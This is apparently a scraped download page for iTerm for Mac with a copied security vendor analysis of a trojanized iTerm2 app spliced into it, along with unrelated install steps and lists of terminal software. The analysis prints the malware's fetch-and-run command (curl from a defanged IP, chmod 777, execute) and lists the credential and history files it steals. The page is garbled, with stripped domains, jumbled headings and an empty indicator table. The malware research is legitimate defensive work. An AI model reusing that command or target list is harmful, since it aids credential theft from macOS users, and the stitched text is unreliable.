Download ITerm For Mac 3.4.10

Posted : admin On 1/26/2022

Steps to install: iTerm is the terminal you are missing out on, for your programming life. Choose the version you want to install from this, downloads page. Unzip the downloaded file. Move the unzipped iTerm application to the “ Applications ” folder and now from your Applications folder, double click the iTerm application to run it. The next step is to configure iTerm’s settings. First you need to import a few color profiles. Open the settings for iTerm, go to the Profiles (#1), select the Colors tab (#2), then in the Color Presets. Selector (#3), select Import (#4): Select all three color profiles I have provided in the download at the end of this post when importing.

We go into more detail about a fake version of the iTerm2 app that downloads and runs malware, detected by Trend Micro as TrojanSpy.Python.ZURU.A, which collects private data from a victim’s machine.

Download ITerm For Mac 3.4.10

Earlier this month, a user on Chinese question-and-answer website Zhihu reported that a search engine result for the keyword “iTerm2” led to a fake website called that mimics the legitimate (Figure 1). A fake version of the iTerm2 app, a macOS terminal emulator, can be downloaded from a link found in When this app is executed, it downloads and runs, a malicious Python script from 47[.]75[.]123[.]111. This malware, which Trend Micro has detected as TrojanSpy.Python.ZURU.A, collects private data from a victim’s machine.

Objective-see previously published a blog entry about this malware, which analyzed how the threat actor repacks the iTerm2 app to load the malicious libcrypto.2.dylib. This, in turn, downloads and runs other components, including the aforementioned script and a Mach-O file called “GoogleUpdate” that contains a Cobalt Strike beacon payload. This blog entry covers the malware’s details.

The trojanized app

As of September 15, is still active. However, the malicious file is not hosted on this website directly. Instead, the website contains a link, hxxp://, from which users are able to download a macOS disk image file (DMG) called iTerm.dmg. The user is redirected to this download URL for iTerm.dmg regardless of the app version the user selects to download from the fake website; the real website has different URLs and files for various versions. The files that are downloaded from the legitimate website come in a ZIP file format, as opposed to the DMG file from the fraudulent website, as shown in Figure 2.

Comparing the folder structure of the DMG and ZIP files shows numerous differences between them:

  • All the Mach-O files in the trojanized iTerm2 app were signed with an Apple Distribution certificate, as shown in Figure 3, whereas files in the legitimate are code signed with a Developer ID Application certificate. According to Apple documentation, an Apple Distribution certificate is only used to sign an app before the developer delivers it to the App Store, so apps downloaded from the App Store generally don’t have an Apple Distribution certificate.
  • The trojanized iTerm2 app contains a file called libcrypto.2.dylib (with a SHA-256 hash of 2c269ff4216dc6a14fd81ffe541994531b23a1d8e0fbd75b9316a9fa0e0d5fef) in its Frameworks folder, which does not exist in the legitimate version, as shown in Figure 4.
  • In the trojanized iTerm2 app, the main Mach-O file has an additional load command called LC_LOAD_DYLIB that loads the libcrypto.2.dylib file, shown in Figure 5.

According to Objective-see’s blog post, the malicious codes contained in the libcrypto.2.dylib file are executed automatically when the victim runs the trojanized iTerm2 app. This is a clever method for repacking legitimate apps that we have not seen before.

Once executed, the malware connects to its server and receives these instructions from it:

  1. 'curl -sfo /tmp/ http://47[.]75[.]123[.]111/ && chmod 777 /tmp/ && python /tmp/ && curl -sfo /tmp/GoogleUpdate http://47[.]75[.]123[.]111/GoogleUpdate && chmod 777 /tmp/GoogleUpdate && /tmp/GoogleUpdate'
  2. Download the script to the folder /tmp/ and execute it
  3. Download “GoogleUpdate” to the folder /tmp/GoogleUpdate and execute it
  4. Collect data using the script

The Python script collects the following system data and files from the victim’s machine, which the script then sends to the server:

  1. Operating system information
  2. Username
  3. Installed applications
  4. Local IP address
  5. Copies of these files and folders:
    1. ~/.bash_history'
    2. ~/.zsh_history
    3. ~/.gitConfig
    4. /etc/hosts
    5. ~/.ssh
    6. ~/.zhHistory
    7. ~/Library/Keychains/Login.keychain-db
    8. ~/Library/Application Support/VanDyke/SecureCRT/Config/
    9. ~/Library/Application Support/iTerm2/SavedState/
  6. The contents of these directories:
    1. ~/ - {current user home directory}
    2. ~/Desktop
    3. ~/Documents
    4. ~/Downloads
    5. /Applications

Other trojanized apps and fake sites

Further analysis of the trojanized iTerm2 app’s Apple Distribution certificate led us to find similar trojanized apps on VirusTotal (Table 1), all of which were trojanized using the same method.

Table 1. Other trojanized apps found on VirusTotal
File NameSHA-256 HashDetection
Microsoft Remote Desktop.dmg5ca2fb207762e886dd3336cf1cb92c28f096a5fbb1798ea6721b7c94c1395259TrojanSpy.MacOS.ZURU.A

Searching VirusTotal for the Secure Sockets Layer (SSL) thumbprint that used revealed several other fraudulent websites. As shown in Figure 6, all of these websites resolved to the same IP address, 43[.]129[.]218[.]115.

We were able to access one of these fake websites,, but the download link on its page was empty at that time, so it remains uncertain whether this website had been used to distribute a trojanized version of SnailSVN, an Apache Subversion (SVN) client for Mac OS X, in the wild (Figure 7). However, all of these domains were inaccessible at the time of writing.

Download server

The server used for hosting the trojanized packages, kaidingle[.]com, was registered on September 7, and is currently still active. According to VirusTotal, apart from iterm.dmg, it also hosts other DMG files such as SecureCTR.dmg and Navicat15_cn.dmg (Figure 8). As of September 18, the latter two DMG files can still be downloaded from the server.

Iterm2 Windows

Based on the server’s information on WHOIS, a query and response protocol, there are four other domains under the same registrant (Figure 9). However, so far, none of these domains show any indication that they’re related to any malware.

Second-stage server

VirusTotal recorded multiple URLs related to a second-stage server under the IP address 47[.]75[.]123[.]111 – the same address as that of the malicious script – from September 8 to 17, as shown in Figure 10.

Besides the script and “GoogleUpdate” components that are part of the trojanized iTerm app malware routine, the second-stage server also hosts four other Mach-O files that are used as post-penetration tools (Table 2).

Table 2. Other Mach-O files hosted in the second-stage server
File NameSHA-256 HashDescription/Detection
la 79ef23214c61228a03faea00a1859509ea3bf0247219d65ae6de335fde4061f5

An open source intranet penetration scanner framework



A tool for port forward and intranet proxy



Netscan scans a network for ports that are open on an IP/IP range, and IP addressess that are in use on that network



Notably, the IP address of the second-stage server is similar to the one “GoogleUpdate” connects to, which is 47[.]75[.]96[.]198. Both of these IP addresses are hosted by Alibaba Hong Kong. As shown in Figure 11, the URLs under 47[.]75[.]96[.]198 were registered around the same time as those in the second-stage server, which suggests that these two servers may have been set up by same threat actor.

Advertisement sites

As detailed in the aforementioned user report, the first item from the search engine results is under the subdomain Searching for this address in Google generates two results that lead only to their cache (Figure 12), and as of this writing, their actual pages are already down.

The first search result, called “Microsoft Remote Desktop,” has an address of hxxp://, but based on its cache (Figure 13) and source code (Figure 14), we found that it redirected visitors to a fake website, hxxp://


Upon checking its main page, we discovered that the second-level domain belongs to an agriculture company north of China. Apart from the subdomain, this second-level domain has 44 other subdomains, almost all of which are used for advertisements that have no relation to the agriculture company (Figure 15). It is possible that the company rents out these subdomains to others for advertising purposes, but cannot prevent them from being used for illegal purposes. If this is the case, the threat actor rents the subdomain for malware distribution.

Security recommendations

Iterm2 Windows 10 Download

To protect systems from threats like these, end users should only download apps from official and legitimate marketplaces. They should be careful about the search results from search engines, and always double-check URLs to make sure these really point to the official sites. Mac users can consider multilayered security solutions such as Trend Micro Antivirus for Mac®, which provides enhanced anti-scam protection that flags and blocks scam websites that attempt to steal their personal data. They may also avail of Antivirus for Mac as part of Trend Micro Maximum Security, a multi-platform solution that offers comprehensive security and multidevice protection against cyberthreats.

Indicators of Compromise (IOCs)

File NameSHA-256 HashDetection


















Microsoft Remote Desktop.dmg





























MITRE Tactics, Techniques, and Procedures (TTPs)





Initial Access


Spearphishing Link

Phishing website from search engine results




Downloads Python script


Malicious File

Executes the repackaged iTerm2 app will launch the malware dylib libcrypt.2.dylib

Defense Evasion


Deobfuscate/Decode Files or Information

Strings in malware dylib are AES and Base64 encoded


Masquerading (6)

Malware is a malware dylib inserted in a repackaged iterm2 app



Archive via Library

Collects various information and adds it to zip archive


Data from Local System

Collects system information, bash history and login keychain information


Data from Configuration Repository (2)

Collects contents of /Library/Application Support/VanDyke/SecureCRT/Config



Exfiltration Over C2 Channel

Files are exfiltrated to hxxp://47[.]75[.]123[.]111/u.php

Iterm2 For Mac

The most frequent installer filename for the program is: The actual developer of this free Mac application is George Nachman. Our built-in antivirus checked this Mac download and rated it as virus free. The current setup file available for download requires 6.1 MB of hard disk space. Download iTerm2 for Mac to improved terminal emulator. ITerm2 is a fork of the older iTerm project. ITerm2 is a Terminal replacement and the successor of iTerm. ITerm2 is an open source replacement for Apple’s Terminal. It’s highly customizable and comes with a lot of useful features. To install iTerm2, open the terminal and run: $ brew cask install iterm2 Zsh (skip – macOS Catalina users).

Download ITerm For Mac 3.4.10 Professional

Iterm2 Macbook Sudo Touch Sensor

  • ZOC Terminal (SSH/ Telnet/Serial Client) v.6.35ZOC is a well known SSH/SSH2/telnet client and terminal emulator. It's functions (like tabbed sessions, typed command history, scrollback, multiple window support, etc.) and solidly implemented emulations make it the preferred tool for people who ...
  • Cluster SSH - Cluster Admin Via SSH v.4.01.01ClusterSSH controls a number of xterm windows via a single graphical console window to allow commands to be interactively run on multiple servers over an ssh ...
  • GTKTerm v. is a small graphical shell like XTerm. It provides serveral terminals in one window and some nice features. Its available for GTK ...
  • v.0.10iTerm is an enhanced terminal emulator program for MacOS X written in Objective-C. It features VT100/ANSI/XTERM emulation, full i18n support, full-screen, multi-tab and other convenient GUI ...

Iterm2 Update

  • Mrxvt v.0.5.4Mrxvt is a multi-tabbed X terminal emulator based on rxvt. It is portable, lightweight and fast. It supports psuedo-transparency, background image (JPEG/PNG/XPM), tinting, NeXT/Rxvt/Xterm/SGI style scrollbar, multi-languages (CJK), XIM, freetype ...
  • Spackle v.1.0A Java based version of the popular PuTTY, but for Mac and Linux. Tested on: OS X 10.5.8-10.6.6, Ubuntu 10.04.2, Fedora 15, and Debian 6.0 using both Oracle Java 1.6 and OpenJDK 6. Requires Java, xterm, ssh, and ...
  • Viewglob v.b.2.0.4Viewglob is a tool to increase the usability of the Unix shell in graphical environments. It watches your shell activity in an xterm and tracks file selections and potential name completions in a GTK+ display showing the layouts of relevant ...
  • SecureCRT for Mac OS X v.6.6.2SecureCRT gives you rock-solid terminal emulation, file transfer, and data tunneling combined with the strong encryption, authentication, and data integrity of the Secure Shell protocol. Whether you are looking for a Telnet replacement with solid ...
  • ZOC Terminal for Mac OS v.6.25Telnet/SSH/SSH2/serial console client and terminal emulator. Its functions (like tabbed sessions, typed command history, scrollback, multiple window support, etc.) and solidly implemented emulations make it the preferred tool for people who have to ...

Mac Pro Iterm Dracula

Download ITerm For Mac 3.4.10 Free

  • ZOC Terminal for Mac OS Telnet/SSH/SSH2/serial console client and terminal emulator.
  • ZOC Terminal (SSH/ Telnet/Serial Client) ZOC is a well known SSH/SSH2/telnet client and terminal
  • SecureCRT for Mac OS X SecureCRT gives you rock-solid terminal emulation, file
  • Spackle A Java based version of the popular PuTTY, but for Mac and
  • iTerm is an enhanced terminal emulator program for MacOS X
  • GTKTerm GTKTerm is a small graphical shell like XTerm . It provides
  • Mrxvt Mrxvt is a multi-tabbed X terminal emulator based on rxvt.
  • Cluster SSH - Cluster Admin Via SSH ClusterSSH controls a number of xterm windows via a single
  • Viewglob Viewglob is a tool to increase the usability of the Unix

Download Iterm2

Visit [email protected] for more of the top downloads here at WinSite!